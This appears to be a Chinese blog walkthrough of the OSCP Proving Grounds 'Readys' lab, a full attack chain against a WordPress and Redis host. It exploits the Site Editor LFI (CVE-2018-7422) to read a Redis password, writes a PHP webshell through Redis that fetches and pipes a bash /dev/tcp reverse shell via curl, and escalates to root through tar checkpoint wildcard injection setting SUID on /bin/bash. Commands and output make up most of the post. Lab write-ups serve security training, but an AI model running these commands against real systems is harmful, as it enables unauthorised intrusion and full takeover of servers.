OSCP - Proving Grounds - Readys

柴郡猫^O^

已于 2024-09-18 18:42:00 修改

阅读量972

点赞数 13

分类专栏： OSCP 文章标签：网络安全安全性测试

于 2024-09-18 18:38:36 首次发布

本文链接：https://blog.csdn.net/N61320/article/details/142332108

版权

OSCP 专栏收录该内容

5 篇文章 0 订阅

订阅专栏

主要知识点：

Wpscan
Redis+本地文件包含创建reverse shell
tar 命令提权
redis路径知识

具体步骤

Execute nmap -p- -sV -A #remote_ip#

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 23:00 UTC
Nmap scan report for #remote_ip#
Host is up (0.00053s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.2
|_http-title: Readys &#8211; Just another WordPress site
6379/tcp open  redis   Redis key-value store

发现值得注意的地方：

80端口开放，安装了wordpress
6379端口开放，安装了redis

执行wpscan,如果本地使用了代理，则需要添加--proxy参数，指定 --plugins-detection 模式，为了得到更准确的插件列表

wpscan --url http://#remote_ip#/ --api-token #api_key# --proxy socks5://#proxy_ip# -e --plugins-detection  aggressive

发现 site-editor 1.1.1插件具有LFI vulnerability

[+] site-editor
 | Location: http://192.168.210.166/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 | Readme: http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.210.166/wp-content/plugins/site-editor/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.210.166/wp-content/plugins/site-editor/readme.txt

Google相关CVE-2018-7422 poc, 得知调用一下url，可以利用vulnerability

http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

将/etc/passwd替换成 /var/www/html/wp-config.php ,/etc/shadow，/home/alice/.ssh/id_rsa等文件，全部失败，暂时放弃

将注意力放在redis上，尝试不同config文件路径，最终发现 /etc/redis/redis.conf可以被读取，并得到redis 密码

利用redis-cli连接对应redis server,加上slaveof no one避免修改记录时报READONLY相关错误

redis-cli -h #remote_ip# -p 6379 -a "Ready4Redis?" slaveof no one
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
                                                                                                                                                                                                                                           
redis-cli -h #remote_ip# -p 6379                                 
192.168.241.166:6379>

在redis-cli中尝试对/var/www/html等路径进行set，save操作时，发现报错，需要寻找有其他有权限写入的路径,尝试继续利用LFI漏洞读取更多的文件，发现 /etc/systemd/system/redis.service 中redis具备写权限的路径为/opt/redis-files/

尝试建立reverse shell,尝试多种方式后，下面的代码成功创建了reverse shell

在本地创建poc.sh

#!/bin/bash

/bin/bash -i >& /dev/tcp/#local_ip#/9000 0>&1

nc命令监听9000端口

nc -nlvp 9000

启动python server

python -m http.server 80

利用redis-cli创建reverse shell,它会调用local machine的python 服务器，拿回poc.sh并执行

#remote_ip#:6379> config set dir /opt/redis-files
OK
#remote_ip#:6379> config set dbfilename test.php
OK
#remote_ip#:6379> set test "<?php system('curl #local_ip#/poc.sh | bash'); ?>"
OK
#remote_ip#:6379> save
OK
192.168.241.166:6379>

在浏览器端访问如下地址，触发reverse shell

http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php

将linpeas.sh上传到remote server，并执行，发现如下shell利用了tar命令来定期备份/var/www/html路径下的文件

*/3 * * * * root /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17  2021 /usr/local/bin/backup.sh

#!/bin/bash

cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi

尝试利用tar命令检查点功能在备份的时候外挂自定义命令

在/var/www/html路径下执行如下命令，当tar命令被用于备份/var/www/html路径下文件时，exploit.sh会被执行，赋予/bin/bash suid的权限

echo "chmod +s /bin/bash" >exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"

等几分钟后，执行 root权限获取到

alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
alice@readys: /bin/bash -p
/bin/bash -p
id
uid=1000(alice) gid=1000(alice) euid=0(root) egid=0(root) groups=0(root),1000(alice)
ls /root 
proof.txt
cat /root/proof.txt
892f38a3df377fc50592924a41f10f64